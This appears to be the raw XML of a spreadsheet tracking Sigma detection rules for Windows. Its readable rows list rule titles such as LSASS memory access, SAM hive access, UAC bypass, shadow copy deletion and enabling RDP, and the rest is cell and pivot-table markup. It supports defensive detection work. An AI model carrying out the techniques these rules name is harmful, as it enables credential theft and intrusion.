  <r>
    <x v="188"/>
    <x v="0"/>
    <x v="0"/>
    <s v="sigma"/>
    <s v="Drop Execution File From by Trusted Process"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="189"/>
    <x v="0"/>
    <x v="0"/>
    <s v="sigma"/>
    <s v="Windows Shell Started Schtasks"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="190"/>
    <x v="0"/>
    <x v="0"/>
    <s v="sigma"/>
    <s v="Scheduled Task Start from Public Directory"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="191"/>
    <x v="0"/>
    <x v="0"/>
    <s v="sigma"/>
    <s v="UAC Bypass via COM Object"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="192"/>
    <x v="0"/>
    <x v="0"/>
    <s v="sigma"/>
    <s v="Disabling UAC via Registry"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="193"/>
    <x v="0"/>
    <x v="0"/>
    <s v="sigma"/>
    <s v="Executing File Named as System Process in Unusual Directory"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="194"/>
    <x v="0"/>
    <x v="0"/>
    <s v="sigma"/>
    <s v="Anomaly in the Windows Critical Process Tree"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="195"/>
    <x v="0"/>
    <x v="0"/>
    <s v="sigma"/>
    <s v="Created Windows Shell from Critical Windows Process"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="196"/>
    <x v="0"/>
    <x v="0"/>
    <s v="sigma"/>
    <s v="Suspicious LSASS Memory Access"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="197"/>
    <x v="0"/>
    <x v="0"/>
    <s v="sigma"/>
    <s v="Detected Access to SAM,SYSTEM and SECURITY registry hives"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="198"/>
    <x v="0"/>
    <x v="0"/>
    <s v="sigma"/>
    <s v="System Network Connections Discovery via Standard Windows Utilities"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="199"/>
    <x v="0"/>
    <x v="0"/>
    <s v="sigma"/>
    <s v="System Network Connections Discovery via PowerShell"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="200"/>
    <x v="0"/>
    <x v="0"/>
    <s v="sigma"/>
    <s v="Enabling RDP via Registry"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="201"/>
    <x v="0"/>
    <x v="0"/>
    <s v="sigma"/>
    <s v="Enabling RDP in Windows Firewall"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="202"/>
    <x v="0"/>
    <x v="0"/>
    <s v="sigma"/>
    <s v="Shadow Copies Deletion"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="203"/>
    <x v="0"/>
    <x v="0"/>
    <s v="sigma"/>
    <s v="Disable Automatic Windows Recovery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714AA-0911-B241-A7EC-6DA0E0DC35A5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7">
    <pivotField dataField="1" showAll="0">
      <items count="2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dataField="1" showAll="0">
      <items count="15">
        <item x="12"/>
        <item x="2"/>
        <item x="3"/>
        <item x="7"/>
        <item x="11"/>
        <item x="13"/>
        <item x="6"/>
        <item x="9"/>
        <item x="5"/>
        <item x="4"/>
        <item x="10"/>
        <item x="8"/>
        <item x="1"/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</pivotFields>
  <rowFields count="1">
    <field x="6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ap_pid" fld="1" subtotal="count" baseField="0" baseItem="0"/>
    <dataField name="Count of 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205" totalsRowShown="0" dataDxfId="6">
  <autoFilter ref="A1:F205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205"/>
  <sheetViews>
    <sheetView tabSelected="1" workbookViewId="0">
      <pane ySplit="1" topLeftCell="A191" activePane="bottomLeft" state="frozen"/>
      <selection pane="bottomLeft" activeCell="D204" sqref="D204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6640625" bestFit="1" customWidth="1"/>
    <col min="4" max="4" width="132.83203125" customWidth="1"/>
    <col min="5" max="5" width="61" customWidth="1"/>
    <col min="6" max="6" width="147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51" x14ac:dyDescent="0.2">
      <c r="A2" s="1" t="s">
        <v>224</v>
      </c>
      <c r="B2" s="1"/>
      <c r="C2" s="1" t="s">
        <v>10</v>
      </c>
      <c r="D2" s="1" t="s">
        <v>100</v>
      </c>
      <c r="E2" s="1"/>
      <c r="F2" s="1" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="3" spans="1:6" ht="51" x14ac:dyDescent="0.2">
      <c r="A3" s="1" t="s">
        <v>225</v>
      </c>
      <c r="B3" s="1"/>
      <c r="C3" s="1" t="s">
        <v>6</v>
      </c>
      <c r="D3" s="1" t="s">
        <v>102</v>
      </c>
      <c r="E3" s="1" t="s">
        <v>101</v>
      </c>
      <c r="F3" s="1" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="4" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A4" s="1" t="s">
        <v>226</v>
      </c>
      <c r="B4" s="1"/>
      <c r="C4" s="1" t="s">
        <v>6</v>
      </c>
      <c r="D4" s="1" t="s">
        <v>103</v>
      </c>
      <c r="E4" s="1"/>
      <c r="F4" s="1" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="5" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A5" s="1" t="s">
        <v>227</v>
      </c>
      <c r="B5" s="1"/>
      <c r="C5" s="1" t="s">
        <v>6</v>
      </c>
      <c r="D5" s="1" t="s">
        <v>104</v>
      </c>
      <c r="E5" s="1"/>
      <c r="F5" s="1" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="6" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A6" s="1" t="s">
        <v>228</v>
      </c>
      <c r="B6" s="1"/>
      <c r="C6" s="1" t="s">
        <v>60</v>
      </c>
      <c r="D6" s="1" t="s">
        <v>105</v>
      </c>
      <c r="E6" s="1"/>
      <c r="F6" s="1" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="7" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A7" s="1" t="s">
        <v>229</v>
      </c>
      <c r="B7" s="1"/>
      <c r="C7" s="1" t="s">
        <v>60</v>
      </c>
      <c r="D7" s="1" t="s">
        <v>106</v>
      </c>
      <c r="E7" s="1"/>
      <c r="F7" s="1" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="8" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A8" s="1" t="s">
        <v>230</v>
      </c>
      <c r="B8" s="1"/>
      <c r="C8" s="1" t="s">
        <v>60</v>
      </c>
      <c r="D8" s="1" t="s">
        <v>107</v>
      </c>
      <c r="E8" s="1"/>
      <c r="F8" s="1" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="9" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A9" s="1" t="s">
        <v>231</v>
      </c>
      <c r="B9" s="1"/>
      <c r="C9" s="1" t="s">
        <v>60</v>
      </c>
      <c r="D9" s="1" t="s">
        <v>108</v>
      </c>
      <c r="E9" s="1"/>
      <c r="F9" s="1" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="10" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A10" s="1" t="s">
        <v>232</v>
      </c>
      <c r="B10" s="1"/>
      <c r="C10" s="1" t="s">
        <v>60</v>
      </c>
      <c r="D10" s="1" t="s">
        <v>109</v>
      </c>
      <c r="E10" s="1"/>
      <c r="F10" s="1" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="11" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A11" s="1" t="s">
        <v>233</v>
      </c>
      <c r="B11" s="1"/>
      <c r="C11" s="1" t="s">
        <v>60</v>
      </c>
      <c r="D11" s="1" t="s">
        <v>110</v>
      </c>
      <c r="E11" s="1"/>
      <c r="F11" s="1" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="12" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A12" s="1" t="s">
        <v>234</v>
      </c>
      <c r="B12" s="1"/>
      <c r="C12" s="1" t="s">
        <v>60</v>
      </c>
      <c r="D12" s="1" t="s">
        <v>111</v>
      </c>
      <c r="E12" s="1"/>
      <c r="F12" s="1" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="13" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A13" s="1" t="s">
        <v>235</v>
      </c>
      <c r="B13" s="1"/>
      <c r="C13" s="1" t="s">
        <v>13</v>
      </c>
      <c r="D13" s="1" t="s">
        <v>112</v>
      </c>
      <c r="E13" s="1"/>
      <c r="F13" s="1" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="14" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A14" s="1" t="s">
        <v>236</v>
      </c>
      <c r="B14" s="1"/>
      <c r="C14" s="1" t="s">
        <v>13</v>
      </c>
      <c r="D14" s="1" t="s">
        <v>113</v>
      </c>
      <c r="E14" s="1"/>
      <c r="F14" s="1" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="15" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A15" s="1" t="s">
        <v>237</v>
      </c>
      <c r="B15" s="1"/>
      <c r="C15" s="1" t="s">
        <v>13</v>
      </c>
      <c r="D15" s="1" t="s">
        <v>114</v>
      </c>
      <c r="E15" s="1"/>
      <c r="F15" s="1" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="16" spans="1:6" ht="68" x14ac:dyDescent="0.2">
      <c r="A16" s="1" t="s">
        <v>238</v>
      </c>
      <c r="B16" s="1"/>
      <c r="C16" s="1" t="s">
        <v>13</v>
      </c>
      <c r="D16" s="1" t="s">
        <v>115</v>
      </c>
      <c r="E16" s="1"/>
      <c r="F16" s="1" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="17" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A17" s="1" t="s">
        <v>239</v>
      </c>
      <c r="B17" s="1"/>
      <c r="C17" s="1" t="s">
        <v>13</v>
      </c>
      <c r="D17" s="1" t="s">
        <v>22</v>
      </c>
      <c r="E17" s="1"/>
      <c r="F17" s="1" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="18" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A18" s="1" t="s">
        <v>240</v>
      </c>
      <c r="B18" s="1"/>
      <c r="C18" s="1" t="s">
        <v>13</v>
      </c>
      <c r="D18" s="1" t="s">
        <v>23</v>
      </c>
      <c r="E18" s="1"/>
      <c r="F18" s="1" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="19" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A19" s="1" t="s">
        <v>241</v>
      </c>
      <c r="B19" s="1"/>
      <c r="C19" s="1" t="s">
        <v>13</v>
      </c>
      <c r="D19" s="1" t="s">
        <v>24</v>
      </c>
      <c r="E19" s="1"/>
      <c r="F19" s="1" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="20" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A20" s="1" t="s">
        <v>242</v>
      </c>
      <c r="B20" s="1"/>
      <c r="C20" s="1" t="s">
        <v>13</v>
      </c>
      <c r="D20" s="1" t="s">
        <v>55</v>
      </c>
      <c r="E20" s="1"/>
      <c r="F20" s="1" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="21" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A21" s="1" t="s">
        <v>243</v>
      </c>
      <c r="B21" s="1"/>
      <c r="C21" s="1" t="s">
        <v>13</v>
      </c>
      <c r="D21" s="1" t="s">
        <v>56</v>
      </c>
      <c r="E21" s="1"/>
      <c r="F21" s="1" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="22" spans="1:6" ht="51" x14ac:dyDescent="0.2">
      <c r="A22" s="1" t="s">
        <v>244</v>
      </c>
      <c r="B22" s="1"/>
      <c r="C22" s="1" t="s">
        <v>13</v>
      </c>
      <c r="D22" s="1" t="s">
        <v>68</v>
      </c>
      <c r="E22" s="1"/>
      <c r="F22" s="1" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="23" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A23" s="1" t="s">
        <v>245</v>
      </c>
      <c r="B23" s="1"/>
      <c r="C23" s="1" t="s">
        <v>13</v>
      </c>
      <c r="D23" s="1" t="s">
        <v>184</v>
      </c>
      <c r="E23" s="1"/>
      <c r="F23" s="1" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="24" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A24" s="1" t="s">
        <v>246</v>
      </c>
      <c r="B24" s="1"/>
      <c r="C24" s="1" t="s">
        <v>13</v>
      </c>
      <c r="D24" s="1" t="s">
        <v>87</v>
      </c>
      <c r="E24" s="1"/>
      <c r="F24" s="1" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="25" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A25" s="1" t="s">
        <v>247</v>
      </c>
      <c r="B25" s="1" t="s">
        <v>428</v>
      </c>
      <c r="C25" s="1" t="s">
        <v>6</v>
      </c>
      <c r="D25" s="1" t="s">
        <v>116</v>
      </c>
      <c r="E25" s="1"/>
      <c r="F25" s="1" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="26" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A26" s="1" t="s">
        <v>248</v>
      </c>
      <c r="B26" s="1" t="s">
        <v>428</v>
      </c>
      <c r="C26" s="1" t="s">
        <v>6</v>
      </c>
      <c r="D26" s="1" t="s">
        <v>117</v>
      </c>
      <c r="E26" s="1"/>
      <c r="F26" s="1" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="27" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A27" s="1" t="s">
        <v>249</v>
      </c>
      <c r="B27" s="1" t="s">
        <v>428</v>
      </c>
      <c r="C27" s="1" t="s">
        <v>6</v>
      </c>
      <c r="D27" s="1" t="s">
        <v>118</v>
      </c>
      <c r="E27" s="1" t="s">
        <v>8</v>
      </c>
      <c r="F27" s="1" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="28" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A28" s="1" t="s">
        <v>250</v>
      </c>
      <c r="B28" s="1" t="s">
        <v>428</v>
      </c>
      <c r="C28" s="1" t="s">
        <v>6</v>
      </c>
      <c r="D28" s="1" t="s">
        <v>119</v>
      </c>
      <c r="E28" s="1" t="s">
        <v>9</v>
      </c>
      <c r="F28" s="1" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="29" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A29" s="1" t="s">
        <v>251</v>
      </c>
      <c r="B29" s="1" t="s">
        <v>428</v>
      </c>
      <c r="C29" s="1" t="s">
        <v>6</v>
      </c>
      <c r="D29" s="1" t="s">
        <v>120</v>
      </c>
      <c r="E29" s="1"/>
      <c r="F29" s="1" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="30" spans="1:6" ht="51" x14ac:dyDescent="0.2">
      <c r="A30" s="1" t="s">
        <v>252</v>
      </c>
      <c r="B30" s="1"/>
      <c r="C30" s="1" t="s">
        <v>6</v>
      </c>
      <c r="D30" s="1" t="s">
        <v>122</v>
      </c>
      <c r="E30" s="1"/>
      <c r="F30" s="1" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="31" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A31" s="1" t="s">
        <v>253</v>
      </c>
      <c r="B31" s="1"/>
      <c r="C31" s="1" t="s">
        <v>13</v>
      </c>
      <c r="D31" s="1" t="s">
        <v>121</v>
      </c>
      <c r="E31" s="1"/>
      <c r="F31" s="1" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="32" spans="1:6" ht="51" x14ac:dyDescent="0.2">
      <c r="A32" s="1" t="s">
        <v>254</v>
      </c>
      <c r="B32" s="1"/>
      <c r="C32" s="1" t="s">
        <v>10</v>
      </c>
      <c r="D32" s="1" t="s">
        <v>141</v>
      </c>
      <c r="E32" s="1" t="s">
        <v>144</v>
      </c>
      <c r="F32" s="1" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="33" spans="1:6" ht="51" x14ac:dyDescent="0.2">
      <c r="A33" s="1" t="s">
        <v>255</v>
      </c>
      <c r="B33" s="1"/>
      <c r="C33" s="1" t="s">
        <v>10</v>
      </c>
      <c r="D33" s="1" t="s">
        <v>138</v>
      </c>
      <c r="E33" s="1"/>
      <c r="F33" s="1" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="34" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A34" s="1" t="s">
        <v>256</v>
      </c>
      <c r="B34" s="1"/>
      <c r="C34" s="1" t="s">
        <v>13</v>
      </c>
      <c r="D34" s="1" t="s">
        <v>139</v>
      </c>
      <c r="E34" s="1"/>
      <c r="F34" s="1" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="35" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A35" s="1" t="s">
        <v>257</v>
      </c>
      <c r="B35" s="1"/>
      <c r="C35" s="1" t="s">
        <v>60</v>
      </c>
      <c r="D35" s="1" t="s">
        <v>11</v>
      </c>
      <c r="E35" s="1" t="s">
        <v>154</v>
      </c>
      <c r="F35" s="1" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="36" spans="1:6" ht="68" x14ac:dyDescent="0.2">
      <c r="A36" s="1" t="s">
        <v>258</v>
      </c>
      <c r="B36" s="1"/>
      <c r="C36" s="1" t="s">
        <v>10</v>
      </c>
      <c r="D36" s="1" t="s">
        <v>12</v>
      </c>
      <c r="E36" s="1" t="s">
        <v>128</v>
      </c>
      <c r="F36" s="1" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="37" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A37" s="1" t="s">
        <v>259</v>
      </c>
      <c r="B37" s="1" t="s">
        <v>429</v>
      </c>
      <c r="C37" s="1" t="s">
        <v>13</v>
      </c>
      <c r="D37" s="1" t="s">
        <v>129</v>
      </c>
      <c r="E37" s="1"/>
      <c r="F37" s="1" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="38" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A38" s="1" t="s">
        <v>260</v>
      </c>
      <c r="B38" s="1" t="s">
        <v>429</v>
      </c>
      <c r="C38" s="1" t="s">
        <v>13</v>
      </c>
      <c r="D38" s="1" t="s">
        <v>130</v>
      </c>
      <c r="E38" s="1"/>
      <c r="F38" s="1" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="39" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A39" s="1" t="s">
        <v>261</v>
      </c>
      <c r="B39" s="1" t="s">
        <v>429</v>
      </c>
      <c r="C39" s="1" t="s">
        <v>13</v>
      </c>
      <c r="D39" s="1" t="s">
        <v>131</v>
      </c>
      <c r="E39" s="1"/>
      <c r="F39" s="1" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="40" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A40" s="1" t="s">
        <v>262</v>
      </c>
      <c r="B40" s="1"/>
      <c r="C40" s="1" t="s">
        <v>13</v>
      </c>
      <c r="D40" s="1" t="s">
        <v>153</v>
      </c>
      <c r="E40" s="1"/>
      <c r="F40" s="1" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="41" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A41" s="1" t="s">
        <v>263</v>
      </c>
      <c r="B41" s="1"/>
      <c r="C41" s="1" t="s">
        <v>13</v>
      </c>
      <c r="D41" s="1" t="s">
        <v>127</v>
      </c>
      <c r="E41" s="1"/>
      <c r="F41" s="1" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="42" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A42" s="1" t="s">
        <v>264</v>
      </c>
      <c r="B42" s="1"/>
      <c r="C42" s="1" t="s">
        <v>13</v>
      </c>
      <c r="D42" s="1" t="s">
        <v>132</v>
      </c>
      <c r="E42" s="1"/>
      <c r="F42" s="1" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="43" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A43" s="1" t="s">
        <v>265</v>
      </c>
      <c r="B43" s="1"/>
      <c r="C43" s="1" t="s">
        <v>6</v>
      </c>
      <c r="D43" s="1" t="s">
        <v>155</v>
      </c>
      <c r="E43" s="1"/>
      <c r="F43" s="1" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="44" spans="1:6" ht="51" x14ac:dyDescent="0.2">
      <c r="A44" s="1" t="s">
        <v>266</v>
      </c>
      <c r="B44" s="1"/>
      <c r="C44" s="1" t="s">
        <v>6</v>
      </c>
      <c r="D44" s="1" t="s">
        <v>156</v>
      </c>
      <c r="E44" s="1"/>
      <c r="F44" s="1" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="45" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A45" s="1" t="s">
        <v>267</v>
      </c>
      <c r="B45" s="1"/>
      <c r="C45" s="1" t="s">
        <v>6</v>
      </c>
      <c r="D45" s="1" t="s">
        <v>172</v>
      </c>
      <c r="E45" s="1"/>
      <c r="F45" s="1" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="46" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A46" s="1" t="s">
        <v>268</v>
      </c>
      <c r="B46" s="1"/>
      <c r="C46" s="1" t="s">
        <v>13</v>
      </c>
      <c r="D46" s="1" t="s">
        <v>133</v>
      </c>
      <c r="E46" s="1"/>
      <c r="F46" s="1" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="47" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A47" s="1" t="s">
        <v>269</v>
      </c>
      <c r="B47" s="1" t="s">
        <v>430</v>
      </c>
      <c r="C47" s="1" t="s">
        <v>13</v>
      </c>
      <c r="D47" s="1" t="s">
        <v>14</v>
      </c>
      <c r="E47" s="1"/>
      <c r="F47" s="1" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="48" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A48" s="1" t="s">
        <v>270</v>
      </c>
      <c r="B48" s="1" t="s">
        <v>430</v>
      </c>
      <c r="C48" s="1" t="s">
        <v>13</v>
      </c>
      <c r="D48" s="1" t="s">
        <v>15</v>
      </c>
      <c r="E48" s="1"/>
      <c r="F48" s="1" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="49" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A49" s="1" t="s">
        <v>271</v>
      </c>
      <c r="B49" s="1" t="s">
        <v>430</v>
      </c>
      <c r="C49" s="1" t="s">
        <v>13</v>
      </c>
      <c r="D49" s="1" t="s">
        <v>150</v>
      </c>
      <c r="E49" s="1"/>
      <c r="F49" s="1" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="50" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A50" s="1" t="s">
        <v>272</v>
      </c>
      <c r="B50" s="1" t="s">
        <v>430</v>
      </c>
      <c r="C50" s="1" t="s">
        <v>13</v>
      </c>
      <c r="D50" s="1" t="s">
        <v>16</v>
      </c>
      <c r="E50" s="1"/>
      <c r="F50" s="1" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="51" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A51" s="1" t="s">
        <v>273</v>
      </c>
      <c r="B51" s="1" t="s">
        <v>430</v>
      </c>
      <c r="C51" s="1" t="s">
        <v>13</v>
      </c>
      <c r="D51" s="1" t="s">
        <v>17</v>
      </c>
      <c r="E51" s="1"/>
      <c r="F51" s="1" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="52" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A52" s="1" t="s">
        <v>274</v>
      </c>
      <c r="B52" s="1"/>
      <c r="C52" s="1" t="s">
        <v>13</v>
      </c>
      <c r="D52" s="1" t="s">
        <v>18</v>
      </c>
      <c r="E52" s="1"/>
      <c r="F52" s="1" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="53" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A53" s="1" t="s">
        <v>275</v>
      </c>
      <c r="B53" s="1"/>
      <c r="C53" s="1" t="s">
        <v>13</v>
      </c>
      <c r="D53" s="1" t="s">
        <v>19</v>
      </c>
      <c r="E53" s="1"/>
      <c r="F53" s="1" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="54" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A54" s="1" t="s">
        <v>276</v>
      </c>
      <c r="B54" s="1"/>
      <c r="C54" s="1" t="s">
        <v>13</v>
      </c>
      <c r="D54" s="1" t="s">
        <v>20</v>
      </c>
      <c r="E54" s="1"/>
      <c r="F54" s="1" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="55" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A55" s="1" t="s">
        <v>277</v>
      </c>
      <c r="B55" s="1"/>
      <c r="C55" s="1" t="s">
        <v>13</v>
      </c>
      <c r="D55" s="1" t="s">
        <v>21</v>
      </c>
      <c r="E55" s="1"/>
      <c r="F55" s="1" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="56" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A56" s="1" t="s">
        <v>278</v>
      </c>
      <c r="B56" s="1"/>
      <c r="C56" s="1" t="s">
        <v>13</v>
      </c>
      <c r="D56" s="1" t="s">
        <v>25</v>
      </c>
      <c r="E56" s="1"/>
      <c r="F56" s="1" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="57" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A57" s="1" t="s">
        <v>279</v>
      </c>
      <c r="B57" s="1"/>
      <c r="C57" s="1" t="s">
        <v>13</v>
      </c>
      <c r="D57" s="1" t="s">
        <v>26</v>
      </c>
      <c r="E57" s="1"/>
      <c r="F57" s="1" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="58" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A58" s="1" t="s">
        <v>280</v>
      </c>
      <c r="B58" s="1" t="s">
        <v>431</v>
      </c>
      <c r="C58" s="1" t="s">
        <v>13</v>
      </c>
      <c r="D58" s="1" t="s">
        <v>27</v>
      </c>
      <c r="E58" s="1"/>
      <c r="F58" s="1" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="59" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A59" s="1" t="s">
        <v>281</v>
      </c>
      <c r="B59" s="1" t="s">
        <v>431</v>
      </c>
      <c r="C59" s="1" t="s">
        <v>13</v>
      </c>
      <c r="D59" s="1" t="s">
        <v>28</v>
      </c>
      <c r="E59" s="1"/>
      <c r="F59" s="1" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="60" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A60" s="1" t="s">
        <v>282</v>
      </c>
      <c r="B60" s="1" t="s">
        <v>431</v>
      </c>
      <c r="C60" s="1" t="s">
        <v>13</v>
      </c>
      <c r="D60" s="1" t="s">
        <v>29</v>
      </c>
      <c r="E60" s="1"/>
      <c r="F60" s="1" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="61" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A61" s="1" t="s">
        <v>283</v>
      </c>
      <c r="B61" s="1" t="s">
        <v>431</v>
      </c>
      <c r="C61" s="1" t="s">
        <v>13</v>
      </c>
      <c r="D61" s="1" t="s">
        <v>30</v>
      </c>
      <c r="E61" s="1"/>
      <c r="F61" s="1" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="62" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A62" s="1" t="s">
        <v>284</v>
      </c>
      <c r="B62" s="1" t="s">
        <v>431</v>
      </c>
      <c r="C62" s="1" t="s">
        <v>13</v>
      </c>
      <c r="D62" s="1" t="s">
        <v>31</v>
      </c>
      <c r="E62" s="1"/>
      <c r="F62" s="1" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="63" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A63" s="1" t="s">
        <v>285</v>
      </c>
      <c r="B63" s="1" t="s">
        <v>431</v>
      </c>
      <c r="C63" s="1" t="s">
        <v>13</v>
      </c>
      <c r="D63" s="1" t="s">
        <v>32</v>
      </c>
      <c r="E63" s="1"/>
      <c r="F63" s="1" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="64" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A64" s="1" t="s">
        <v>286</v>
      </c>
      <c r="B64" s="1" t="s">
        <v>431</v>
      </c>
      <c r="C64" s="1" t="s">
        <v>13</v>
      </c>
      <c r="D64" s="1" t="s">
        <v>33</v>
      </c>
      <c r="E64" s="1"/>
      <c r="F64" s="1" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="65" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A65" s="1" t="s">
        <v>287</v>
      </c>
      <c r="B65" s="1" t="s">
        <v>431</v>
      </c>
      <c r="C65" s="1" t="s">
        <v>13</v>
      </c>
      <c r="D65" s="1" t="s">
        <v>34</v>
      </c>
      <c r="E65" s="1"/>
      <c r="F65" s="1" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="66" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A66" s="1" t="s">
        <v>288</v>
      </c>
      <c r="B66" s="1" t="s">
        <v>431</v>
      </c>
      <c r="C66" s="1" t="s">
        <v>13</v>
      </c>
      <c r="D66" s="1" t="s">
        <v>35</v>
      </c>
      <c r="E66" s="1"/>
      <c r="F66" s="1" t="s">
        <v>7</v>
